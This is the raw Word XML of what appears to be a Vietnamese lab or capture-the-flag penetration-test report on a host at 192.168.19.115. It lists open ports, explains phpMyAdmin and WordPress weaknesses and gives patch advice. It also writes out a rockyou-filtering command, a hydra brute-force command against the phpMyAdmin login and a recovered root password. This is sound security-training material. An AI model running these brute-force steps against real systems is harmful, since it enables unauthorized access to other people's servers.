                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="6431E41F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">TCP: </w:t>
            </w:r>
            <w:r w:rsidR="2CB35DC8" w:rsidRPr="6431E41F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>22, 80, 49037, 50179, 53969</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA28EC" w14:paraId="51363D0C" w14:textId="77777777" w:rsidTr="13C1602D">
        <w:trPr>
          <w:trHeight w:val="500"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3765" w:type="dxa"/>
            <w:vMerge/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62FD5D50" w14:textId="77777777" w:rsidR="00EA28EC" w:rsidRPr="00F17226" w:rsidRDefault="00EA28EC" w:rsidP="00842431">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="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2CF1BEEC" w14:textId="2FB74F67" w:rsidR="00EA28EC" w:rsidRPr="003E68BE" w:rsidRDefault="00EA28EC" w:rsidP="00842431">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F17226">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">UDP: </w:t>
            </w:r>
            <w:r w:rsidR="001F3875" w:rsidRPr="001F3875">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:bCs/>
                <w:highlight w:val="red"/>
              </w:rPr>
              <w:t>[Liệt kê tất cả các port]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28D0E2FB" w14:textId="1F0FC52F" w:rsidR="00EA28EC" w:rsidRDefault="00C366A5" w:rsidP="00EA28EC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="200" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc57241318"/>
      <w:r>
        <w:t>Khởi tạo s</w:t>
      </w:r>
      <w:r w:rsidR="001F3875">
        <w:t xml:space="preserve">hell với quyền </w:t>
      </w:r>
      <w:r>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="001F3875">
        <w:t>ser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> thường</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="70A0870E" w14:textId="653448E8" w:rsidR="00EA28EC" w:rsidRPr="00DF4FAE" w:rsidRDefault="001F3875" w:rsidP="00EA28EC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Lỗ hổng đã khai thác</w:t>
      </w:r>
      <w:r w:rsidR="00EA28EC" w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00EA28EC" w:rsidRPr="4D6D463C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="47EA0CF6" w:rsidRPr="4D6D463C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lỗ hổng phpmyadmin, </w:t>
      </w:r>
      <w:r w:rsidRPr="4D6D463C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> lỗ hổng</w:t>
      </w:r>
      <w:r w:rsidR="47EA0CF6" w:rsidRPr="4D6D463C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="529A1AEB" w:rsidRPr="4D6D463C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WordPress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596A160D" w14:textId="744C9F35" w:rsidR="00EA28EC" w:rsidRPr="00F043C0" w:rsidRDefault="001F3875" w:rsidP="00EA28EC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Hlk57240179"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Giải thích lỗ hổng</w:t>
      </w:r>
      <w:r w:rsidR="00EA28EC" w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="7773B6DC" w14:textId="528E0CCB" w:rsidR="49D18844" w:rsidRDefault="49D18844" w:rsidP="321E5494">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="321E5494">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Lỗ hổng phpmyadmin: </w:t>
      </w:r>
      <w:r w:rsidR="7A6307A0" w:rsidRPr="321E5494">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>sử dụng lệnh GET, sau đó là POST để thực hiện các tác vụ của cơ sở dữ liệu</w:t>
      </w:r>
      <w:r w:rsidR="03BCA626" w:rsidRPr="321E5494">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>. Ở đây, sử dụng lệnh POST để brute force tài khoản để xâm nhập vào trang web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5120688E" w14:textId="2F53EF71" w:rsidR="5AF2C74D" w:rsidRDefault="5AF2C74D" w:rsidP="321E5494">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="321E5494">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Lỗ hổng WordPress: lỗ hổng cho phép tin tặc xóa các tệp tin trên máy chủ và chiếm quyền điều khiển website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DCD533" w14:textId="1472D470" w:rsidR="00EA28EC" w:rsidRPr="00F043C0" w:rsidRDefault="001F3875" w:rsidP="00EA28EC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Khuyến nghị vá lỗ hổng</w:t>
      </w:r>
      <w:r w:rsidR="00EA28EC" w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B503D1B" w14:textId="32B424CB" w:rsidR="14F5C398" w:rsidRDefault="14F5C398" w:rsidP="321E5494">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="321E5494">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Lỗ hổng phpmyadmin: sử dụng các bản vá mới nhất,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A32200" w14:textId="4AD5F964" w:rsidR="14F5C398" w:rsidRDefault="14F5C398" w:rsidP="321E5494">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="321E5494">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Lỗ hổng WordPress: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DF8FDC" w14:textId="494D647C" w:rsidR="14F5C398" w:rsidRDefault="14F5C398" w:rsidP="321E5494">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="321E5494">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Rà soát lại danh sách người dùng và các quản trị viên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A3EA40" w14:textId="65E373A1" w:rsidR="14F5C398" w:rsidRDefault="14F5C398" w:rsidP="321E5494">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="321E5494">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Thực hiện backup toàn bộ dữ liệu của website để tránh trường hợp bị tin tặc tấn công phá hoại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EBF5A0" w14:textId="3DFA41F9" w:rsidR="00EA28EC" w:rsidRPr="00F92FFF" w:rsidRDefault="001F3875" w:rsidP="00EA28EC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng</w:t>
      </w:r>
      <w:r w:rsidR="00EA28EC" w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00D11294" w:rsidRPr="321E5494">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Nghiêm trọng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661E5908" w14:textId="3D60CF2C" w:rsidR="00EA28EC" w:rsidRDefault="00D11294" w:rsidP="00D11294">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cách thức khai thác</w:t>
      </w:r>
      <w:r w:rsidR="00EA28EC" w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00EA28EC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>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45"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA28EC" w14:paraId="0241264E" w14:textId="77777777" w:rsidTr="00842431">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9345" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
          </w:tcPr>
          <w:p w14:paraId="66EA96CA" w14:textId="3D174921" w:rsidR="00EA28EC" w:rsidRDefault="00D11294" w:rsidP="00842431">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>[Lệnh tấn công/mã khai thác]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="354A663E" w14:textId="076F8370" w:rsidR="00D11294" w:rsidRPr="00691796" w:rsidRDefault="00D11294" w:rsidP="00842431">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t xml:space="preserve">[màu </w:t>
            </w:r>
            <w:r w:rsidRPr="00D11294">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>đỏ</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t xml:space="preserve"> nếu có thay đổi trong mã khai thác]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1574A3ED" w14:textId="70E4B11E" w:rsidR="00BE1768" w:rsidRDefault="0007091B" w:rsidP="34BCAC5E">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007091B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>[Step-by-step cách thức để có quyền truy cập vào máy chủ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56024793" w14:textId="70E4B11E" w:rsidR="7B344B45" w:rsidRDefault="7B344B45" w:rsidP="005C2055">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="34BCAC5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Theo hint, ta có thể đoán được rằng trong password có chứa “root”, do đó ta lọc những password có chứa “root” trong rockyou.txt và lưu vào file passroot.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519F8D25" w14:textId="70E4B11E" w:rsidR="7B344B45" w:rsidRPr="005C2055" w:rsidRDefault="7B344B45" w:rsidP="005C2055">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2055">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$ cat /usr/share/wordlists/rockyou.txt | grep “root” &gt; passroot.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1877865B" w14:textId="70E4B11E" w:rsidR="7B344B45" w:rsidRDefault="7B344B45" w:rsidP="005C2055">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="34BCAC5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Với user là “root”, ta tiến hành brute force bằng hydra để tìm mật khẩu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4395EC27" w14:textId="7EA2D806" w:rsidR="7B344B45" w:rsidRPr="005C2055" w:rsidRDefault="7B344B45" w:rsidP="4D6D463C">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Historic" w:eastAsia="Segoe UI Historic" w:hAnsi="Segoe UI Historic" w:cs="Segoe UI Historic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="050505"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2055">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2055">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Historic" w:eastAsia="Segoe UI Historic" w:hAnsi="Segoe UI Historic" w:cs="Segoe UI Historic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="050505"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l root -P passroot.txt </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidRPr="005C2055">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI Historic" w:eastAsia="Segoe UI Historic" w:hAnsi="Segoe UI Historic" w:cs="Segoe UI Historic"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>192.168.19.115</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005C2055">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Historic" w:eastAsia="Segoe UI Historic" w:hAnsi="Segoe UI Historic" w:cs="Segoe UI Historic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="050505"/>
        </w:rPr>
        <w:t xml:space="preserve"> -V http-post-form "/phpmyadmin/index.php:pma_username=^USER^&amp;pma_password=^PASS^&amp;server=1:denied"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E2C5F3" w14:textId="7EA4391F" w:rsidR="0BC2A15A" w:rsidRDefault="0BC2A15A" w:rsidP="34BCAC5E">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77D22126" wp14:editId="2B0EA3B1">
            <wp:extent cx="5943600" cy="2476500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1940517294" name="Picture 194051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517294"/>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B262EC7" w14:textId="163E221D" w:rsidR="673FB0E1" w:rsidRPr="008423B5" w:rsidRDefault="00BC6C1F" w:rsidP="005C2055">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Sử dụng cặp</w:t>
      </w:r>
      <w:r w:rsidR="0AB7D019" w:rsidRPr="7EB630ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> user password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> vừa lấy được là </w:t>
      </w:r>
      <w:r w:rsidRPr="001D6B45">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root:hank342root</w:t>
      </w:r>
      <w:r w:rsidR="008D6D1B" w:rsidRPr="001D6B45">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>958</w:t>
      </w:r>
      <w:r w:rsidR="0AB7D019" w:rsidRPr="001D6B45">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0AB7D019" w:rsidRPr="7EB630ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">để đăng nhập vào </w:t>
      </w:r>
      <w:r w:rsidR="0AB7D019" w:rsidRPr="7EB630ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>192.168.19.115/</w:t>
      </w:r>
      <w:r w:rsidR="007D6FA6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>phpmyadmin/</w:t>
      </w:r>
      <w:r w:rsidR="00D9005F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D9005F" w:rsidRPr="00274E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>và tiến hành tạo</w:t>
      </w:r>
      <w:r w:rsidR="00D9005F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008423B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">account để đăng nhập vào trang </w:t>
      </w:r>
      <w:r w:rsidR="008423B5" w:rsidRPr="7EB630ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>192.168.19.115/</w:t>
      </w:r>
      <w:r w:rsidR="005C2055">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wp-login.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9EBC18" w14:textId="03FADC6F" w:rsidR="00281AAC" w:rsidRDefault="00311FE7" w:rsidP="00EA28EC">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00311FE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E54BFB3" wp14:editId="49E73F54">
            <wp:extent cx="5943600" cy="2141855"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2141855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DAE970" w14:textId="64F9AA35" w:rsidR="00281AAC" w:rsidRDefault="00281AAC" w:rsidP="00EA28EC">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59039BB4" wp14:editId="3B44F70F">
            <wp:extent cx="5943600" cy="1447165"/>
            <wp:effectExtent l="0" t="0" r="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3435C7FD" w14:textId="1853C647" w:rsidR="62A1A9BF" w:rsidRDefault="1EDFB5D0" w:rsidP="62A1A9BF">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="6A7D6042">
        <w:t xml:space="preserve">Với user và password vừa tạo truy cập </w:t>
      </w:r>
      <w:r w:rsidRPr="2A7803EB">
        <w:t xml:space="preserve">vào trang </w:t>
      </w:r>
      <w:r w:rsidR="273DC3A7" w:rsidRPr="4D8329CA">
        <w:t>web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7304BE42" w14:textId="2E794A16" w:rsidR="1EDFB5D0" w:rsidRDefault="4659C088" w:rsidP="2A7803EB">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A54B78F" wp14:editId="186C6DD0">
            <wp:extent cx="4572000" cy="3086100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="409714378" name="Picture 4097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14378"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
